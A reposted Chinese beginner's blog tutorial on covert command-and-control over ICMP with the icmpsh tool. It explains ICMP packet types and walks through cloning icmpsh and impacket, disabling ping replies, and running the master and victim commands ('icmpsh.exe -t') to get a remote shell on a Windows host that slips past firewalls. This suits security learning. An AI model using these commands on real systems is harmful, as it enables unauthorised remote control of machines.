栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

隐藏c2隧道---ICMP之icmpsh的使用

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

隐藏c2隧道---ICMP之icmpsh的使用

纯纯菜鸟的学习记录,如有错误还请纠正

先来了解一下ICMP协议吧

ICMP用来传递差错,控制,查询等信息,在网络层,由于IP协议不可靠,就有了ICMP协议,由于网络探测,路由追踪与回馈


ICMP报文类型:


不可达类型的代码字段常用取值:


超时报文代码字段常用取值:


报文格式:

参考于https://blog.csdn.net/qq_21231413/article/details/88171590?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164464850716780265452295%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164464850716780265452295&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allfirst_rank_ecpm_v1~rank_v31_ecpm-2-88171590.pc_search_result_cache&utm_term=icmp%E5%8D%8F%E8%AE%AE&spm=1018.2226.3001.4187


隐藏c2隧道之icmpsh

原理:进行隐蔽传输时,攻击端把要执行的命令隐藏在ICMP_ECHO数据包中,肉鸡接收数据包,解出命令并在防火墙内部主机上执行再把执行结果隐藏在ICMP_ECHOREPLY数据包中,发送给外部攻击端

利用关键点:数据部分

下图是ping,然后wireshark抓的ICMP包

ps:ICMP报文是由系统内核处理,不用占用任何端口 (一般通信要端口,比如你访问一个网站[80端口],本机会随机生成一个大于1023的端口去访问)


工具:icmpsh 处理畸形ping数据

受攻击必须是Windows,,,

1.下载:

git clone https://github.com/inquisb/icmpsh.git

2.关闭ping回复,防止内核自己对ping包回应,刷屏

sysctl -w net.ipv4.icmp_echo_ignore_all=1 #关闭ping回复,0开启

3.安装环境

git clone https://github.com/SecureAuthCorp/impacket.git #失败的话试试直接连接物理网络

cd impacket

sudo python setup.py install

    攻击端:

    cd icmpsh

    ./icmpsh_m.py 受攻击方 #命令

    受攻击机方命令

    icmpsh.exe -t


    执行whoami

    ok我们来看看 ICMP数据包(数据包太多了,不停止抓包,数据包一直有,wireshark太强了) data部分就是whoami

    学习于漏洞银行

    转载请注明:文章转载自 www.mshxw.com
    本文地址:https://www.mshxw.com/it/733303.html
    我们一直用心在做
    关于我们 文章归档 网站地图 联系我们

    版权所有 (c)2021-2022 MSHXW.COM

    ICP备案号:晋ICP备2021003244-6号